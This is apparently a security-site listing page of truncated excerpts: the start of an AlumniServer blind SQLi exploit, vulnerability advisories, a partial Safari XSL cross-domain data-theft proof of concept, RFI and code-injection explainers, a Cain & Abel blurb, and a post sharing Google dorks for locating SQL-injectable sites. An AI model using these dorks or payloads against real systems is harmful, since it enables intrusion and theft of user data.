# #Used modules import urllib2,sys,re,os #Defined functions def init(): if(sys.platform=='win32'): os.system("cls") os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit") os.system ("color 02") else: os.system("clear") print "\t########################### print "\t########################### print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n" & ... Read more » |
CMS INFORMATION:
-->WEB: http://www.alumniserver.net/ -->DOWNLOAD: http://www.alumniserver.net/ -->DEMO: N/A -->CATEGORY: CMS/Education -->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools and companies. Services for usersinclude profile page,... -->RELEASED: 2009-06-11 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "AlumniServer project" -->CATEGORY: AUTH-BYPASS (SQLi) -->AFFECT VERSION: CURRENT -->Discovered Bug date: 2009-06-16 -->Reported Bug date: 2009-06-16 -->Fixed bug date: N/A -->Info patch (????): N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia ... Read more » |
e. Sekarang saya harus membuat lebih banyak pengguna dengan serveral
izin yang sama. Apakah ada perintah dalam MySQL yang memungkinkan saya untuk membuat pengguna baru oleh menyalin hak pengguna dari template? Cara Mengatur Privileges Pengguna Bagaimana saya harus menetapkan Privileges sehingga pengguna dapat membuat dan memodifikasi sendiri database? Aku berjalan MySQL 3.23.53 dengan phpMyAdmin 2.5.4. Saya memiliki beberapa DBS dan pengguna. Saya atas setup user baru dan database tanpa masalah. Pengguna hanya dapat melihat data yang baru karena harus. Saya ingin mengizinkan user untuk dapat membuat database mereka sendiri. Sekarang di phpmyadmin, ketika mereka membuat database baru, mereka tidak dapat membuat tabel di dalamnya, dan mereka tidak dapat melihat database mereka hanya dibuat dalam daftar database mereka. Walaupun saya dapat melihat database mereka dibuat dengan user admin. Bila pengguna Pertama membuat database dan mencoba untuk ... Read more » |
Well, this attack will never work because Wapiti is trying to include the
file boot.ini which is (as far as I know but I'm not a windows expert) always on drive c: The errormessage shows that the INETPUB Directory is on drive E: so a simple directory traversal attack won't work (at least for this file). --cut-- This runtime error, 800A000D occurs when you execute a VBScript. My suggestion is that there is a VBScript statement that does not understand a keyword you are using in your script. Alternatively, you may not be running the script as an ordinary user and not as an Administrator. --cut-- Source: http://www.computerperformance.co.uk/Logon/code/code_800A000D.htm If you have access to the system you are testing, search for a file on drive e: (maybe a txt or asp file which is part of the application) and modify the wapiti URL. Or (better) look at the soucecode of toplinks-archive-courses-spas.asp ... Read more » |
____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_110$2009 ------------------------------ [ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of S ... Read more » |
Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain. This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL. This is best illustrated with a sample evil XSL file which abuses this function: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/ xmlns:str="http://exslt.org/ <xsl:template match="*"> <html> <body> Below, you should see e-mail stolen cross-domain! <p/> <xsl:value-of select="document('https:// |
Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a Code Injection attack can be disastrous. For instance, code injection is used by some Computer worms to propagate. Overview and example ... Read more » |
How the attack worksRemote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: include($page . '.php'); This line of PHP code, is then used in URLs like the following example: http://www.vulnerable.example.org/index.php?page=archive Because the h ... Read more » |
i don't know why it's could be happen
but i remember what one founder of google said like this "google is the program which can learn of everyone try to input or search everything with word or sentence and it will saved in it's database" because of that issue the google will search all people wanted without expected just copy paste this following order inurl:(0x3a,username,0x3a,username) inurl:table_schema inurl:table_name or other SQL injection command input with "inurl" then the result is every site which have bug for SQL injection will be posted to google result nice, isn't...... regard Siegh_wahrheit |
Cain & able is a password recovery tools for microsoft operating
system. because it can easily be used to perform various types of
recovery password by sniffing the network, cracking encrypted passwords
using dictionary, bruteforce, and cryptanalysis, recording VoIP
conversations in, and perform decoding scrambled passwords, recovering
wireless networkeys do, revealing password boxes, uncovering cached
passwords and analyzing routing protocols. This program does not
exploit any software vulnerabilities or bugs that can not be solved
with little effort. Includes some security aspects / weakness in the
protocol standards, authentication methods and caching mechanisms; with
the main goal is the simplified recovery of passwords and a mandate
from a variety of sources, but it also ships some "non standard"
utilities for Microsoft Windows users.
Cain & Abel has been developed with the hope will be useful for network administrators, teachers, security consultants / professio ... Read more » |